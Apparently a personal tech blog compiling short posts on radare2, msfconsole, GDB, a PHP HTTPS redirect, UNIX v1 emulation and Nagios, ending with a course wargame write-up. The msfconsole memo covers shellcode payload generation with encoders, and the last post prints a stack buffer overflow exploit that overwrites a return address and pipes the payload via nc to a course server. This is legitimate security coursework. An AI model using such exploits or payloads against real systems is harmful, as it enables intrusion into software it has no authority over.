Radare2 Memo

Commands

Radare2 is a handy tool for analysing binary code, which offers a clean and fast way to browser binary file in assembly code. Here, I am writing down common commands I use so far:

• fs: view flag sections
• fs symbols: switch to "symbols" flag sections
• f: show flag list of current symbol section
• s main: jump to main (flag)
• af: analysis function
• pdf: view current function in assembly code
• V: visual mode
• p (in visual mode): switch between different view methods
• q (in visual mode): quit visual mode

Configurations

• e asm.syntax=(intel|att): change asm code syntax

Reference

• R2 "Book"

msfconsole Memo

In Secure Programming assignment, we are asked to get the flag on the server using shellcode solution. So, I've studied msfconsole and written some notes here:

Pick Target Platform / Action

First step, pick pick your target platform and the action using 'use' command. For example: use payload/linux/x86/exec

Show

'show encoders' to view the encoder list.

Generate Code

Generate your result by 'generate' command. And the options are as below

• -h: see the help text
• -b <opt>: the list of characters to avoid, ex. '\x00\xff'
• -e <opt>: the name of the encoder module to use
• -f <opt>: the output file name (otherwise stdout)
• -i <opt>: the number of encoding iterations
• -o <opt>: a comma separated list of options in VAR=VAL format
• -s <opt>: add NOOP characters
• -t <opt>: the output format: raw, ruby, rb, perl, pl, c, js_be, je_le, java, dll ...

More

• You can execute shell commands in msfconsole directly.

Reference

• Generating Payloads

Detecting SSL in PHP on Heroku

In order to have a certified connection, websites would like to the user to use HTTPS instead of HTTP. However, sometimes we can't control what's the URL that the user request, which means that the user may ask for http://facebook.com instead of https://facebook.com.

So, to solve this problem, we detect that if the user is requesting HTTP URLs. And, if yes, response 301 to the user to ask him to redirect to our HTTPS site.

Normal, if we implement it in PHP, add the following code in the front of the file:

However, on Heroku, they don't have $_SERVER['HTTPS'] but $_SERVER['HTTP_X_FORWARDED_PROTO']) instead. So, we do:

GDB Memo

Intro

GDB was a scaring tool for me years ago; however, I found it's actually pretty handful. And, instead of Googling the commands every time, I am writing down the common ones I use in this post:

Common Commands

General

• kill: stop exec
• run: start execution
• quit
• help

Monitoring

• <ctl-c>: break exec
• continue
• list: see where's the exec stops
• next: will go 'over' the function calls
• step: will go 'into' the function calls
• print variable: see variable
• finish: return from a function

Call Stack

• backtrace
• info frame
• info locals
• info args

Breakpoint

• break line number
• break function name
• tbreak: same as break but only stops once (temporary breakpoint)
• info breakpoints
• disable breakpoint number
• ignore breakpoint number times: ignore the break point for number of times

Watchpoint

• watch variable
• rwatch variable: read watchpoint
• awatch variable: read/write watchpoint
• * info breakpoints
• * disable breakpoint number

Memory

char *s = "hello!\n"

• x/s s: print string
• x/c s: print s[0]
• x/4c s: print s[0]~s[3]
• x/t s: print first 32 bit
• x/x s: print 8 bytes in hex
• info registers
• core core: see core dump crash
• nexti: 'next' for instruction level
• stepi: 'step' for instruction level
• disassemble function name

Other Helpful Commands

• info proc
• frame: show where am I

Print Variables (Organised)

• * info variables: list "All global and static variable names"
• * info locals: list "Local variables of current stack frame" (names and values), including static variables in that function
• * info args: list "Arguments of the current stack frame" (names and values)

More: Fork

• set follow-fork-mode mode: follow which process after fork
• mode -> parent, child
• show follow-fork-mode
• set detach-on-fork mode (reference)
• mode -> on, off
• on(default): the child process (or parent process, depending on the value of follow-fork-mode) will be detached and allowed to run independently.
• off: both processes will be held under the control of GDB. One process (child or parent, depending on the value of follow-fork-mode) is debugged as usual, while the other is held suspended.
• show detach-on-fork
• set follow-exec-mode mode
• mode -> new, same

Reference

• RMS's gdb Debugger Tutorial
• 4.11 Debugging Forks
• Printing all global variables/local variables? - Stackoverflow

Install UNIX Version 1 (1972) on Linux

I am now reading the classic book, "The Unix Programming Environment", which was written in 1990s. It was suggested by my seniors, and the author is from Bell Labs, so it should be a nice book to learn the original design of UNIX.

However, while I was testing the commands in the book, I found that my environment is pretty different from the author's. So, I am building up his environment, UNIX version (1972, I guess), for fun.

Step 1. Setup Simulator

We simulate the old environment by using simhv simulator.

Step 2. Download UNIX

Download the UNIX code from qrush's github.

Step 3. Setup Image Files

qrush's image file was not working currently on my machine, so I found another image files to replace it.

Solution

I wrote a Makefile to done all the tasks, and here's it:

* note: I found that the bash requires extremely large resources, which may be implemented by using some busy-waiting stuff.

Nagios - Server Monitoring

In order to get notifications when any of my services is down. I've installed Nagios on my server. Here are the sites I referred to while installation:

Setup

Installation Steps (Detailed): http://geekpeek.net/install-nagios-core-4-on-ubuntu/

Further Configuration for Notification: http://idevit.nl/node/93

Notice

Things have to be noticed while referring to the two sites:

• restart apache after add new config file for Nagios
• update your email address in contacts.cfg (in order to receive the mail)

Stack Buffer Overflow

In the course, Secure Programming, we are asked to solve wargame problems. Here comes the first practice: Stack Buffer Overflow.

Problem

void do_magic(char *buf,int n){
        int i;
        srand(time(NULL));
        for(i=0;i<n;i++)
                buf[i] ^= rand()%256;
}

void magic(){
        char magic_str[60];
        scanf("%s",magic_str);
        do_magic(magic_str,strlen(magic_str));
        printf("%s",magic_str);
}

Goal: Get the flag!

Analysis

The structure looks like this: local variable stack -> frame pointer -> return address. And, our goal is to replace the content of return address, and make the program start to run unwanted function.

[Solution 1] Disassemble the bin file.

You can apply any of following tools:

1. objdump: objdump -d magic
2. Online decompiler: http://decompiler.fit.vutbr.cz/decompilation-run/
3. IDA Pro

And, I can get:

08048681 <magic>:
 8048681:       55                      push   %ebp
 8048682:       89 e5                   mov    %esp,%ebp
 8048684:       83 ec 58                sub    $0x58,%esp
 8048687:       8d 45 bc                lea    -0x44(%ebp),%eax
 804868a:       89 44 24 04             mov    %eax,0x4(%esp)
 804868e:       c7 04 24 36 88 04 08    movl   $0x8048836,(%esp)
 8048695:       e8 66 fe ff ff          call   8048500 <__isoc99_scanf@plt>

We can learn that the character array size would be 0x44 = 68. And, should add 4 for frame pointer.
*note: "ESP is the current stack pointer. EBP is the base pointer for the current stack frame."

[Solution 2] GDB debug analysis

>> gdb magic

(gdb) b magic

(gdb) run

(gdb) disas

Dump of assembler code for function magic:
   0x08048681 <+0>:     push   %ebp
   0x08048682 <+1>:     mov    %esp,%ebp
   0x08048684 <+3>:     sub    $0x58,%esp
   0x08048687 <+6>:     lea    -0x44(%ebp),%eax
   0x0804868a <+9>:     mov    %eax,0x4(%esp)
   0x0804868e <+13>:    movl   $0x8048836,(%esp)
   0x08048695 <+20>:    call   0x8048500 <__isoc99_scanf@plt>
=> 0x0804869a <+25>:    lea    -0x44(%ebp),%eax
   0x0804869d <+28>:    mov    %eax,(%esp)
   0x080486a0 <+31>:    call   0x80484d0 <strlen@plt>
   0x080486a5 <+36>:    mov    %eax,0x4(%esp)
   0x080486a9 <+40>:    lea    -0x44(%ebp),%eax
   0x080486ac <+43>:    mov    %eax,(%esp)
   0x080486af <+46>:    call   0x8048621 <do_magic>
   0x080486b4 <+51>:    lea    -0x44(%ebp),%eax
   0x080486b7 <+54>:    mov    %eax,0x4(%esp)
   0x080486bb <+58>:    movl   $0x8048836,(%esp)
   0x080486c2 <+65>:    call   0x8048460 <printf@plt>
   0x080486c7 <+70>:    leave
   0x080486c8 <+71>:    ret

(gdb) info registers

eax            0x1      1
ecx            0x1      1
edx            0xf7fb88c4       -134510396
ebx            0xf7fb6ff4       -134516748
esp            0xffffd560       0xffffd560
ebp            0xffffd5b8       0xffffd5b8
esi            0x0      0
edi            0x0      0
eip            0x804869a        0x804869a <magic+25>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Try different size of inputs until ebp is modified, and we can know the size for stack buffer overflow.

Solution

(python -c 'print "heron\n" + "\x00"*72 + "\x0e\x86\x04\x08"' && cat) | nc secprog.cs.nctu.edu.tw 6666

• ( python ... && cat ) is designed for not passing EOF to nc, which may close the connection before we interact with it.
• \x0e\x86\x04\x08 is the address of the function we want the program to run, and it's indicated in little endian.

Reference

• Wikipedia - Stack Buffer Overflow
• Stackoverflow - What is between ESP and EBP?
• Piping data to a process's stdin without causing EOF afterward